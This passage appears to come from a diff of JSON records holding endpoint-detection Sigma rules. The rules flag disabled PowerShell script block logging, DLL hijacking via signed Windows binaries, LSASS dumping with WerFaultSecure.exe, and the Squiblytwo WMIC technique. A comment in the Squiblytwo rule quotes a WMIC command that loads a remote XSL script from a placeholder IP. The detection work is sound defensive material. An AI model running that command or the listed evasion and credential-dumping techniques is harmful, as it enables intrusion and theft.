ProcessSigned: 'true'\n\n exclusion_nable:\n - ProcessParentImage:\n - '?:\\Program Files (x86)\\N-able Technologies\\AutomationManagerAgent\\AutomationManager.AgentService.exe'\n - '?:\\Program Files (x86)\\N-able Technologies\\Windows Agent\\bin\\agent.exe'\n - ProcessImage:\n - '?:\\Program Files (x86)\\N-able 
Technologies\\AutomationManagerAgent\\AutomationManager.AgentService.exe'\n - '?:\\Program Files (x86)\\N-able Technologies\\Windows Agent\\bin\\agent.exe'\n\n exclusion_monitoring_agent:\n ProcessImage:\n - '?:\\Program Files (x86)\\Advanced Monitoring Agent GP\\ScriptRunner\\ScriptRunner.exe'\n - '?:\\Program Files (x86)\\Advanced Monitoring Agent\\ScriptRunner\\ScriptRunner.exe'\n\n exclusion_mmc:\n ProcessCommandLine: '?:\\Windows\\system32\\mmc.exe ?:\\Windows\\system32\\\\*'\n\n exclusion_checkpoint:\n ProcessImage|startswith: '?:\\Program Files (x86)\\CheckPoint\\'\n ProcessSignature: 'Check Point Software Technologies Ltd.'\n ProcessSigned: 'true'\n\n exclusion_defender:\n ProcessImage:\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\nissrv.exe'\n - '?:\\Program Files\\Windows Defender\\MsMpEng.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Corporation'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Windows'\n\n exclusion_windows:\n - ProcessImage:\n - '?:\\windows\\system32\\msiexec.exe'\n - '?:\\windows\\syswow64\\msiexec.exe'\n - '?:\\windows\\system32\\deviceenroller.exe'\n - '?:\\windows\\syswow64\\deviceenroller.exe'\n - '?:\\windows\\system32\\omadmclient.exe'\n - '?:\\windows\\syswow64\\omadmclient.exe'\n - '?:\\windows\\system32\\vmms.exe'\n - '?:\\windows\\syswow64\\vmms.exe'\n - '?:\\$WINDOWS.~BT\\Sources\\SetupHost.exe'\n - '?:\\Windows\\CCM\\CcmExec.exe'\n - ProcessParentImage: '?:\\Windows\\CCM\\CcmExec.exe'\n\n exclusion_ishealth:\n ProcessImage:\n - '?:\\Program Files (x86)\\IS-Health\\IS-Health\\IS-Health.exe'\n - '?:\\Program Files\\IS-Health\\IS-Health\\IS-Health.exe'\n\n exclusion_trendmicro:\n ProcessImage: '?:\\Program Files\\Trend Micro\\Cloud Endpoint\\CloudEndpointService.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": 
false, + "rule_level_override": null, + "rule_id": "191f1aa8-40cc-4b37-b39c-8821d11b97d5", + "rule_name": "Script Block Logging Disabled in Registry", + "rule_description": "Detects the EnableScriptBlockLogging value being set to 0 in registry.\nAttackers can disable the logging of PowerShell scripts by changing the value of EnableScriptBlockLogging to 0 in registry in order to avoid PowerShell detections.\nIt is recommended to investigate the process that did this modification, as well as its execution context.\n", + "rule_creation_date": "2025-08-29", + "rule_modified_date": "2026-03-16", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1112", + "attack.t1562.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "1982114f-b8b0-4ab1-8856-9eb7baf58dd8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.080714Z", + "creation_date": "2026-03-23T11:45:34.080716Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.080720Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + 
"references": [ + "https://twitter.com/0gtweet/status/1477925112561209344", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_format_com.yml", + "content": "title: DLL Hijacking via format.com\nid: 1982114f-b8b0-4ab1-8856-9eb7baf58dd8\ndescription: |\n Detects potential Windows DLL Hijacking via format.com.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers could use this technique by copying legitimate Windows signed executable from System32 or SysWow64 directory to a non-standard directory and plant a malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://twitter.com/0gtweet/status/1477925112561209344\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/01/05\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'format.com'\n ProcessSignature: 'Microsoft Windows'\n #ImageLoaded: '*.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + 
"rule_level_override": null, + "rule_id": "1982114f-b8b0-4ab1-8856-9eb7baf58dd8", + "rule_name": "DLL Hijacking via format.com", + "rule_description": "Detects potential Windows DLL Hijacking via format.com.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers could use this technique by copying legitimate Windows signed executable from System32 or SysWow64 directory to a non-standard directory and plant a malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2022-01-05", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "198dc4a0-fad3-4a63-96df-c66da0fff340", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.078646Z", + "creation_date": 
"2026-03-23T11:45:34.078648Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.078652Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://github.com/xforcered/WFH", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_wifitask.yml", + "content": "title: DLL Hijacking via wifitask.exe\nid: 198dc4a0-fad3-4a63-96df-c66da0fff340\ndescription: |\n Detects potential Windows DLL Hijacking via wifitask.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wifitask.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\HTTPAPI.dll'\n - '\\IPHLPAPI.DLL'\n - '\\umpdc.dll'\n - '\\webservices.dll'\n 
- '\\wlanapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "198dc4a0-fad3-4a63-96df-c66da0fff340", + "rule_name": "DLL Hijacking via wifitask.exe", + "rule_description": "Detects potential Windows DLL Hijacking via wifitask.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "19d12965-f4b4-469a-b904-87bd6dc211d8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + 
"rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.595087Z", + "creation_date": "2026-03-23T11:45:34.595091Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.595099Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://github.com/xforcered/WFH", + "https://securityintelligence.com/posts/windows-features-dll-sideloading/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_dsrm.yml", + "content": "title: DLL Hijacking via dsr.exe\nid: 19d12965-f4b4-469a-b904-87bd6dc211d8\ndescription: |\n Detects potential Windows DLL Hijacking via dsr.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - 
classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dsrm.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\activeds.dll'\n - '\\secur32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "19d12965-f4b4-469a-b904-87bd6dc211d8", + "rule_name": "DLL Hijacking via dsr.exe", + "rule_description": "Detects potential Windows DLL Hijacking via dsr.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2022-09-15", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "1a1f6e7a-2498-43ab-a378-5c398ec012d1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.092694Z", + "creation_date": "2026-03-23T11:45:34.092696Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.092701Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://securityintelligence.com/posts/windows-features-dll-sideloading/", + "https://www.hexacorn.com/blog/2015/02/23/beyond-good-ol-run-key-part-28/", + "https://github.com/xforcered/WFH", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_recoverydrive.yml", + "content": "title: DLL Hijacking via RECOVERYDRIVE.exe\nid: 1a1f6e7a-2498-43ab-a378-5c398ec012d1\ndescription: |\n Detects potential Windows DLL Hijacking via RECOVERYDRIVE.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - 
https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://www.hexacorn.com/blog/2015/02/23/beyond-good-ol-run-key-part-28/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'RECOVERYDRIVE.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcd.dll'\n - '\\reagent.dll'\n - '\\unattend.dll'\n - '\\uxtheme.dll'\n - '\\vssapi.dll'\n - '\\wdscore.dll'\n - '\\wimgapi.dll'\n - '\\winhttp.dll'\n - '\\wofutil.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "1a1f6e7a-2498-43ab-a378-5c398ec012d1", + "rule_name": "DLL Hijacking via RECOVERYDRIVE.exe", + "rule_description": "Detects potential Windows DLL Hijacking via RECOVERYDRIVE.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content 
and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2022-09-15", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "1a5344cf-01b1-4cce-92c3-e46480185079", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.086161Z", + "creation_date": "2026-03-23T11:45:34.086163Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.086168Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.zerosalarium.com/2025/09/Dumping-LSASS-With-WER-On-Modern-Windows-11.html", + "https://attack.mitre.org/techniques/T1003/001/" + ], + "name": "t1003_001_werfaultsecure_unknown_location.yml", + "content": "title: WerFaultSecure.exe Executed From a Non-Common Location\nid: 1a5344cf-01b1-4cce-92c3-e46480185079\ndescription: |\n Detects the execution of WerFaultSecure.exe from 
non-standard directories outside of System32, SysWOW64, and WinSxS.\n WerFaultSecure.exe is a Microsoft-signed binary used by Windows for Protected Process error reporting.\n Attackers can abuse this legitimate tool by copying a vulnerable version of it to alternative locations for process memory dumping, therefore bypassing security controls on protected processes.\n It is recommended to investigate the parent process and analyze any generated dump files for credential harvesting activities.\nreferences:\n - https://www.zerosalarium.com/2025/09/Dumping-LSASS-With-WER-On-Modern-Windows-11.html\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2025/09/15\nmodified: 2025/10/01\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003\n - attack.t1003.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n OriginalFileName: 'WerFaultSecure.exe'\n\n filter_legitimate_folder:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n\n exclusion_serviceprotection:\n ParentImage: '?:\\Program Files\\ServiceProtection\\ServiceProtection.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'PHARMADATA PTY LTD'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "1a5344cf-01b1-4cce-92c3-e46480185079", + "rule_name": "WerFaultSecure.exe Executed From a Non-Common Location", + "rule_description": "Detects the execution of WerFaultSecure.exe from non-standard directories outside of System32, SysWOW64, and WinSxS.\nWerFaultSecure.exe is a Microsoft-signed binary used by Windows for Protected Process error reporting.\nAttackers can abuse this legitimate tool 
by copying a vulnerable version of it to alternative locations for process memory dumping, therefore bypassing security controls on protected processes.\nIt is recommended to investigate the parent process and analyze any generated dump files for credential harvesting activities.\n", + "rule_creation_date": "2025-09-15", + "rule_modified_date": "2025-10-01", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.credential_access" + ], + "rule_technique_tags": [ + "attack.t1003", + "attack.t1003.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "1a60aaa8-4707-470a-bfa7-fcd2a9b3c464", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.586727Z", + "creation_date": "2026-03-23T11:45:34.586731Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.586739Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://wietze.github.io/blog/save-the-environment-variables", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_wordpad.yml", + "content": "title: DLL Hijacking via 
WORDPAD.exe\nid: 1a60aaa8-4707-470a-bfa7-fcd2a9b3c464\ndescription: |\n Detects potential Windows DLL Hijacking via WORDPAD.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'WORDPAD.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcrypt.dll'\n - '\\dataexchange.dll'\n - '\\msctf.dll'\n - '\\msxml3.dll'\n - '\\netprofm.dll'\n - '\\npmproxy.dll'\n - '\\uiribbon.dll'\n - '\\windowscodecs.dll'\n - '\\edputil.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files\\Microsoft\\Edge\\Application\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: 
selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "1a60aaa8-4707-470a-bfa7-fcd2a9b3c464", + "rule_name": "DLL Hijacking via WORDPAD.exe", + "rule_description": "Detects potential Windows DLL Hijacking via WORDPAD.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2022-09-15", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "1a6ba792-4593-442a-9a80-d38ce5e97360", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + 
"last_update": "2026-03-23T11:45:34.595992Z", + "creation_date": "2026-03-23T11:45:34.595996Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.596004Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmic", + "https://attack.mitre.org/techniques/T1220/", + "https://www.netskope.com/blog/you-can-run-but-you-cant-hide-advanced-emotet-updates" + ], + "name": "t1218_squiblytwo.yml", + "content": "title: Possible Squiblytwo Attack Detected\nid: 1a6ba792-4593-442a-9a80-d38ce5e97360\ndescription: |\n Detects the usage of a custom formatter to gain remote execution through WMIC execution.\n WMIC can take an XSL script to format the data, which may execute a malicious JScript. This technique is also known as Squiblytwo.\n It is recommended to check for suspicious activities by the current process or any of its children.\nreferences:\n - https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmic\n - https://attack.mitre.org/techniques/T1220/\n - https://www.netskope.com/blog/you-can-run-but-you-cant-hide-advanced-emotet-updates\ndate: 2021/02/08\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.defense_evasion\n - attack.t1220\n - attack.t1218\n - attack.t1059.007\n - attack.t1047\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Script.XSL\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # wmic os get /FORMAT:\"http://xxx.xxx.xxx.xxx/keswD.xsl\" (Koadic)\n selection_1:\n - Image|endswith: '\\wmic.exe'\n - OriginalFileName: 'wmic.exe'\n selection_2:\n - CommandLine|contains:\n - '/format '\n - '/format:'\n - '/format :'\n - '/ format:'\n - '/ format :'\n - \"/'format':\"\n - \"/'format' :\"\n - \"/ 'format':\"\n - \"/ 'format' :\"\n - '/\"format\":'\n - '/\"format\" :'\n - '/ 
